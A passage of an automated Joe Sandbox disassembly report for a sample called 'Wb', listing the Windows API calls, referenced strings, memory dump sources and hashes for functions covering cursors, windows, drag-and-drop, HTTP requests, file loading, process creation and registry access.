                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3719E71900705AFDB20DFA8CE85AAEBBF5FF48704F104558E5C6A2598DBBAE940CB50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 01030884
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0103088F
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0103089A
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 010308A5
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 010308B0
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 010308BB
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 010308C6
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 010308D1
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 010308DC
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 010308E7
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 010308F2
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 010308FD
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 01030908
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 01030913
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0103091E
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 01030929
                                                                                                                                                                                                                                                                                                        • GetCursorInfo.USER32(?), ref: 01030939
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0103097B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: dcbb5d0ea9844a3a64d002aa55f7d938480eec7b069177d58f993e0ecbe5a71b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 46f5d6e7596d8a8de7779899735d650e57986174528f4ba4653881260e8af5fc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcbb5d0ea9844a3a64d002aa55f7d938480eec7b069177d58f993e0ecbe5a71b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 244161B0E083196BDB509FBA8C8986EBFE8BF44750B50456AF15CE7281DB78A401CF91
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00FD0436
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0108170C,00000FA0,9835BB83,?,?,?,?,00FF2733,000000FF), ref: 00FD048C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00FF2733,000000FF), ref: 00FD0497
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00FF2733,000000FF), ref: 00FD04A8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00FD04BE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00FD04CC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00FD04DA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FD0505
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FD0510
                                                                                                                                                                                                                                                                                                        • ___scrt_fastfail.LIBCMT ref: 00FD0457
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD0413: __onexit.LIBCMT ref: 00FD0419
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • kernel32.dll, xrefs: 00FD04A3
                                                                                                                                                                                                                                                                                                        • SleepConditionVariableCS, xrefs: 00FD04C4
                                                                                                                                                                                                                                                                                                        • InitializeConditionVariable, xrefs: 00FD04B8
                                                                                                                                                                                                                                                                                                        • WakeAllConditionVariable, xrefs: 00FD04D2
                                                                                                                                                                                                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00FD0492
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6ee9b47a22f6f99ad838889594048dd2b693dd2cac3ebcfed3409e082d8f260c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 96c6704047c1beeb9ad6eeaa949c6b03d77c8a741d2685838ef21b60259e0555
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ee9b47a22f6f99ad838889594048dd2b693dd2cac3ebcfed3409e082d8f260c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25213476A447047FD7217BA4AC4AB6E37A6EF05B61F08012FFD8196348DF7998009B61
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen
                                                                                                                                                                                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                                        • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                                        • Opcode ID: a6c42936c3097b51959139110d6bcb13dae8c49910c6675af5fb8580e801bb21
                                                                                                                                                                                                                                                                                                        • Instruction ID: 81154df0d52ebd5d7d85ca1c0e137b82a81e4b50df7c12601cdda710ae09bf05
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6c42936c3097b51959139110d6bcb13dae8c49910c6675af5fb8580e801bb21
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6E10532E00616DBCB149FB9C8817FDFBF1BF04720F044159E596EB255EB38A9899B90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,0104DCD0), ref: 01024F6C
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01024F80
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01024FDE
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01025039
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01025084
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010250EC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCFD52: _wcslen.LIBCMT ref: 00FCFD5D
                                                                                                                                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,01077C10,00000061), ref: 01025188
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                        • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                                        • Opcode ID: f506672682c54157c8d0e433eeca836b0f1daeb7505d34845986ca2c4141f555
                                                                                                                                                                                                                                                                                                        • Instruction ID: 79bbb35e670944ac5546e8ad4c450d50a98011b1e862bc60880bd5cd34ad9aa9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f506672682c54157c8d0e433eeca836b0f1daeb7505d34845986ca2c4141f555
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30B1F0316083229FC350DF28CC90AAEB7E6AF94764F50495DF5D6C7292DB38D844CB96
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103BBF8
                                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103BC10
                                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103BC34
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103BC60
                                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103BC74
                                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103BC96
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103BD92
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01020F4E: GetStdHandle.KERNEL32(000000F6), ref: 01020F6D
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103BDAB
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103BDC6
                                                                                                                                                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0103BE16
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0103BE67
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0103BE99
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103BEAA
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103BEBC
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103BECE
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0103BF43
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 11ec25abcbf6617232d26b467ac93e34e07d7193c98fb9a8cad0e2f03ae553b7
                                                                                                                                                                                                                                                                                                        • Instruction ID: eb75c1a2fb68210b7e2aede0ad29548ddb2e81ed6e41f96d8d61417674e205c6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11ec25abcbf6617232d26b467ac93e34e07d7193c98fb9a8cad0e2f03ae553b7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2F1BE716043009FD725EF29C891B6ABBE9AFC4314F08859DF5C58B2A2DB75E841CF52
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0104DCD0), ref: 01034B18
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01034B2A
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0104DCD0), ref: 01034B4F
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,0104DCD0), ref: 01034B9B
                                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,0104DCD0), ref: 01034C05
                                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000009), ref: 01034CBF
                                                                                                                                                                                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 01034D25
                                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 01034D4F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(010829C0), ref: 00FF3F72
                                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(010829C0), ref: 00FF4022
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00FF4066
                                                                                                                                                                                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00FF406F
                                                                                                                                                                                                                                                                                                        • TrackPopupMenuEx.USER32(010829C0,00000000,?,00000000,00000000,00000000), ref: 00FF4082
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FF408E
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 01047823
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 01047897
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 010478B9
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 010478CC
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 010478ED
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FB0000,00000000), ref: 0104791C
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01047935
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0104794E
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 01047955
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0104796D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 01047985
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB2234: GetWindowLongW.USER32(?,000000EB), ref: 00FB2242
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 01049BA3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010480AE: ClientToScreen.USER32(?,?), ref: 010480D4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010480AE: GetWindowRect.USER32(?,?), ref: 0104814A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010480AE: PtInRect.USER32(?,?,?), ref: 0104815A
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 01049C0C
                                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 01049C17
                                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 01049C3A
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 01049C81
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 01049C9A
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 01049CB1
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 01049CD3
                                                                                                                                                                                                                                                                                                        • DragFinish.SHELL32(?), ref: 01049CDA
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 01049DCD
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                                        • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                                        • Opcode ID: 937f937754dfd8d0103c17a060cc0e53ef8ea02757856ee73246c56582cd59e5
                                                                                                                                                                                                                                                                                                        • Instruction ID: a1077a01d316403584ddbbfc5af31c532ed954fa71131f5ec7205aa6b4529a93
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 937f937754dfd8d0103c17a060cc0e53ef8ea02757856ee73246c56582cd59e5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F6177B1508305AFC711EFA1CC85DAFBBE8FF98750F00092EB5D1922A1DB759A09CB52
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0102CEF5
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0102CF08
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0102CF1C
                                                                                                                                                                                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0102CF35
                                                                                                                                                                                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0102CF78
                                                                                                                                                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0102CF8E
                                                                                                                                                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0102CF99
                                                                                                                                                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0102CFC9
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0102D021
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0102D035
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0102D040
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                                        • Opcode ID: b8fa9302468f8c6d704b3629c765c778755be6cee077ea5f33fab2a2e0086587
                                                                                                                                                                                                                                                                                                        • Instruction ID: f22a13b3d9d547bbdbd7275d7fa6453f0d5619d23997bdefa32d4a0247a13f14
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8fa9302468f8c6d704b3629c765c778755be6cee077ea5f33fab2a2e0086587
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E518CB5500618BFEB619FA4CA88BAF7BFCFF18784F00845AF98586240D739D9459B60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,010466D6,?,?), ref: 01048FEE
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,010466D6,?,?,00000000,?), ref: 01048FFE
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,010466D6,?,?,00000000,?), ref: 01049009
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,010466D6,?,?,00000000,?), ref: 01049016
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 01049024
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,010466D6,?,?,00000000,?), ref: 01049033
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0104903C
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,010466D6,?,?,00000000,?), ref: 01049043
                                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,010466D6,?,?,00000000,?), ref: 01049054
                                                                                                                                                                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,01050C04,?), ref: 0104906D
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0104907D
                                                                                                                                                                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0104909D
                                                                                                                                                                                                                                                                                                        • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 010490CD
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 010490F5
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0104910B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3354425fb10c4a056e130c3793aed5f651a1cebbbdf2e14c11ecd3dfd7b551ce
                                                                                                                                                                                                                                                                                                        • Instruction ID: 53b2bef45f7345b4797ea030d9ae9337744204a79d39533c592b344f6437ec7a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3354425fb10c4a056e130c3793aed5f651a1cebbbdf2e14c11ecd3dfd7b551ce
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79414AB9600208BFDB219FA9DD88EAF7BB9FF99715F008068F985D7250D7359941CB20
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103C10E,?,?), ref: 0103D415
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D451
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4C8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4FE
                                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103C154
